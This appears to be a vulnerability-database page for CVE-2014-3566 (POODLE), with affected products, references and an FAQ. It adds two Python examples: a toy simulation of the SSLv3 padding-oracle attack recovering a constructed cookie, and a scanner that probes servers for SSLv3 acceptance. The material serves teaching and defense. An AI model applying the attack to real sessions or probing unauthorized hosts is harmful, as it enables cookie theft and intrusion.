Vulnerability Description
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue.
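The following is an added example, not code from OpenSSL or from any advisory referenced on this page. It models the record-layer behaviour the description refers to: an SSL 3.0 receiver inspects only the final padding-length byte, the filler bytes before it are random and not covered by the MAC, and when data plus MAC already fill whole blocks a complete block of padding is appended. A man-in-the-middle who can make the victim's browser resend a request with chosen path and body lengths (the POODLE setup) copies the ciphertext block holding a cookie byte into that final padding position; the record is accepted exactly when the copied block decrypts to a length byte of 15, which leaks one cookie byte per roughly 256 forced requests. The block cipher (a 4-round Feistel network over HMAC-SHA256 standing in for AES/3DES), the session keys, the cookie value `SECRET` and the request layout are all constructed for the example; the `strict_padding` flag shows why the same swap fails against the TLS 1.0 padding rule.

```python
# Added example (not OpenSSL code): toy SSLv3 CBC record layer and the
# POODLE block-swap attack against it. Block cipher = 4-round Feistel over
# HMAC-SHA256 so only the standard library is needed; it stands in for AES.
# ENC_KEY, MAC_KEY, SECRET and the request shape are constructed here.
import hashlib
import hmac
import os

BLOCK = 16     # cipher block size
MAC_LEN = 20   # SSLv3 with SHA-1 uses 20-byte MACs (HMAC-SHA256 truncated here)
ENC_KEY, MAC_KEY = os.urandom(16), os.urandom(16)   # assumed session keys
SECRET = b"session=9f3c"                            # constructed cookie value

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):   # Feistel round function, 8-byte output
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in range(4):
        l, r = r, _xor(l, _f(key, i, r))
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _f(key, i, l)), l
    return l + r

def cbc_encrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        out.append(_xor(block_decrypt(key, data[i:i + BLOCK]), prev))
        prev = data[i:i + BLOCK]
    return b"".join(out)

def mac(data):
    return hmac.new(MAC_KEY, data, hashlib.sha256).digest()[:MAC_LEN]

def sslv3_seal(plaintext):
    """MAC-then-encrypt with SSLv3 padding: random filler bytes, then one
    length byte. If data+MAC already fills whole blocks, a full block of
    padding (length byte 15) is appended; that block holds no MAC'd data."""
    body = plaintext + mac(plaintext)
    pad_len = BLOCK - 1 - len(body) % BLOCK
    body += os.urandom(pad_len) + bytes([pad_len])   # filler is never checked
    iv = os.urandom(BLOCK)
    return iv, cbc_encrypt(ENC_KEY, iv, body)

def sslv3_open(iv, ct, strict_padding=False):
    """True if the record is accepted. SSLv3 inspects only the length byte;
    strict_padding=True adds the TLS 1.0+ rule that every filler byte must
    equal the length byte, which is what makes the block swap fail there."""
    pt = cbc_decrypt(ENC_KEY, iv, ct)
    pad_len = pt[-1]
    if pad_len >= BLOCK:
        return False
    if strict_padding and any(b != pad_len for b in pt[-pad_len - 1:-1]):
        return False
    body = pt[:len(pt) - pad_len - 1]
    return hmac.compare_digest(body[-MAC_LEN:], mac(body[:-MAC_LEN]))

def victim_request(prefix_len, suffix_len):
    """Attacker JavaScript makes the browser send a request whose path
    (prefix) and body (suffix) lengths it chooses; the cookie rides along
    unchanged and each retry is re-encrypted under a fresh IV."""
    return sslv3_seal(b"/" * prefix_len + SECRET + b"x" * suffix_len)

def poodle_recover_byte(k, strict_padding=False, max_attempts=20000):
    """Recover SECRET[k]: place it as the last byte of block i, make the
    record end in a full padding block, then replace the last ciphertext
    block with C_i. The server accepts only if D(C_i)[15] ^ C_{n-1}[15] == 15,
    i.e. P_i[15] == 15 ^ C_{i-1}[15] ^ C_{n-1}[15]; about 256 tries per byte."""
    prefix_len = (BLOCK - 1 - k) % BLOCK
    suffix_len = -(prefix_len + len(SECRET) + MAC_LEN) % BLOCK
    i = (prefix_len + k) // BLOCK + 1          # +1: blocks[0] is the IV
    for attempt in range(1, max_attempts + 1):
        iv, ct = victim_request(prefix_len, suffix_len)
        blocks = [iv] + [ct[j:j + BLOCK] for j in range(0, len(ct), BLOCK)]
        tampered = b"".join(blocks[1:-1] + [blocks[i]])   # MITM: C_n := C_i
        if sslv3_open(iv, tampered, strict_padding):
            return (BLOCK - 1) ^ blocks[i - 1][-1] ^ blocks[-2][-1], attempt
    return None, max_attempts

def poodle_recover_secret(length=len(SECRET)):
    return bytes(poodle_recover_byte(k)[0] for k in range(length))

if __name__ == "__main__":
    got = poodle_recover_secret()
    print("recovered:", got, "correct:", got == SECRET)
```

The oracle is the accept/reject decision itself (in a real session, a TLS alert and connection teardown versus a normal response), so no decryption key is ever learned; the attacker only needs the victim to keep resending the same request under changing ciphertext. Passing `strict_padding=True` to `poodle_recover_byte` never yields a byte, because under the TLS padding rule the swapped block would have to decrypt to sixteen identical bytes.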
CVSS Score
3.4 (LOW)
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Redhat | Enterprise Linux | 5 |
| Redhat | Enterprise Linux Desktop | 6.0 |
| Redhat | Enterprise Linux Desktop Supplementary | 5.0 |
| Redhat | Enterprise Linux Server | 6.0 |
| Redhat | Enterprise Linux Server Supplementary | 5.0 |
| Redhat | Enterprise Linux Workstation | 6.0 |
| Redhat | Enterprise Linux Workstation Supplementary | 6.0 |
| Ibm | Aix | 5.3 |
| Apple | Mac Os X | <= 10.10.1 |
| Mageia | Mageia | 3.0 |
| Novell | Suse Linux Enterprise Desktop | 9.0 |
| Novell | Suse Linux Enterprise Software Development Kit | 11.0 |
| Novell | Suse Linux Enterprise Server | 11.0 |
| Opensuse | Opensuse | 12.3 |
| Fedoraproject | Fedora | 19 |
| Openssl | Openssl | 0.9.8 |
| Ibm | Vios | 2.2.0.10 |
| Netbsd | Netbsd | 5.1 |
| Debian | Debian Linux | 7.0 |
| Oracle | Database | 11.2.0.4 |
Related Weaknesses (CWE)
References
- ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2014-015.txt.asc (Third Party Advisory)
- http://advisories.mageia.org/MGASA-2014-0416.html (Third Party Advisory)
- http://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc (Third Party Advisory)
- http://archives.neohapsis.com/archives/bugtraq/2014-10/0101.html (Third Party Advisory)
- http://archives.neohapsis.com/archives/bugtraq/2014-10/0103.html (Third Party Advisory)
- http://askubuntu.com/questions/537196/how-do-i-patch-workaround-sslv3-poodle-vul (Third Party Advisory)
- http://blog.cryptographyengineering.com/2014/10/attack-of-week-poodle.html (Third Party Advisory)
- http://blog.nodejs.org/2014/10/23/node-v0-10-33-stable/ (Third Party Advisory)
- http://blogs.technet.com/b/msrc/archive/2014/10/14/security-advisory-3009008-rel (Third Party Advisory)
- http://docs.ipswitch.com/MOVEit/DMZ82/ReleaseNotes/MOVEitReleaseNotes82.pdf (Third Party Advisory)
- http://downloads.asterisk.org/pub/security/AST-2014-011.html (Third Party Advisory)
- http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ss (Third Party Advisory)
- http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04583581 (Third Party Advisory)
- http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04779034 (Third Party Advisory)
- http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10705 (Third Party Advisory)
FAQ
What is CVE-2014-3566?
CVE-2014-3566 is a vulnerability with a CVSS score of 3.4 (LOW). The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue.
How severe is CVE-2014-3566?
CVE-2014-3566 has been rated LOW with a CVSS base score of 3.4/10. The low score reflects the preconditions: the attacker must hold an active man-in-the-middle position and must be able to make the victim's client resend the same request many times (on the order of 256 per recovered byte). When those conditions are met, the impact is disclosure of cleartext such as session cookies, so the rating should not be read as "safe to leave SSL 3.0 enabled".
Is there a patch for CVE-2014-3566?
Vendor advisories and patch information are listed in the references above, and the affected products table lists the versions each vendor reported. Because the weakness is in the SSL 3.0 protocol itself rather than in a single implementation, the effective remediation is to disable SSL 3.0 on servers and clients; OpenSSL 1.0.1j and later additionally implement TLS_FALLBACK_SCSV so that a client's forced downgrade to SSL 3.0 can be detected and refused.
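As an added example, not taken from any vendor advisory above, here is the check a practitioner wants after applying a fix: send a raw SSL 3.0 ClientHello that offers only CBC cipher suites and classify the first record the server sends back. A ServerHello carrying version 3.0 means the server still negotiates SSL 3.0 with a CBC suite, which is the combination CVE-2014-3566 needs; an alert (typically handshake_failure or protocol_version) or a dropped connection means it does not. The cipher-suite list and the alert names are assumptions chosen for the example, `probe()` needs network access, and `classify()` is exercised offline on constructed response bytes.

```python
# Added example: raw SSL 3.0 ClientHello probe for servers that still
# negotiate SSLv3 with CBC suites. Not vendor code; the suite list is an
# assumption (a few common CBC suites) and the response parser is minimal.
import os
import socket
import struct

SSLV3 = b"\x03\x00"
# CBC suites only, so that a ServerHello means POODLE-relevant SSLv3:
# RSA_3DES_EDE_CBC_SHA, RSA_AES_128/256_CBC_SHA, DHE_RSA_AES_128/256_CBC_SHA
CBC_SUITES = [0x000A, 0x002F, 0x0035, 0x0033, 0x0039]
ALERTS = {40: "handshake_failure", 47: "illegal_parameter", 70: "protocol_version"}

def sslv3_client_hello():
    """Handshake record (type 22) holding a ClientHello (type 1) for 3.0."""
    suites = b"".join(struct.pack(">H", s) for s in CBC_SUITES)
    body = (SSLV3 + os.urandom(32) + b"\x00"        # version, random, empty session id
            + struct.pack(">H", len(suites)) + suites
            + b"\x01\x00")                          # one compression method: null
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16" + SSLV3 + struct.pack(">H", len(handshake)) + handshake

def classify(response):
    """Map the first server record to a verdict string."""
    if len(response) < 5:
        return "closed"           # connection dropped: SSLv3 not offered
    ctype, version = response[0], response[1:3]
    if ctype == 0x16 and len(response) >= 6 and response[5] == 0x02:   # ServerHello
        if version == SSLV3:
            return "sslv3-accepted"
        return "accepted-version-%d.%d" % (version[0], version[1])
    if ctype == 0x15 and len(response) >= 7:                            # Alert
        desc = response[6]
        return "alert:%s(%d)" % (ALERTS.get(desc, "other"), desc)
    return "unknown"

def probe(host, port=443, timeout=5.0):
    """Network check; returns a classify() verdict, 'timeout' or 'unreachable'."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(sslv3_client_hello())
            try:
                data = s.recv(4096)
            except socket.timeout:
                return "timeout"
    except OSError:
        return "unreachable"
    return classify(data)

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "localhost"
    print(target, probe(target))
```

Run it as `python3 probe.py hostname`; a server that has had SSL 3.0 disabled will answer with an alert or simply close the connection, and only `sslv3-accepted` indicates exposure. Because the hello offers no RC4 or TLS-only suites, a server that accepts it has agreed to exactly the protocol and cipher-mode combination the description above refers to.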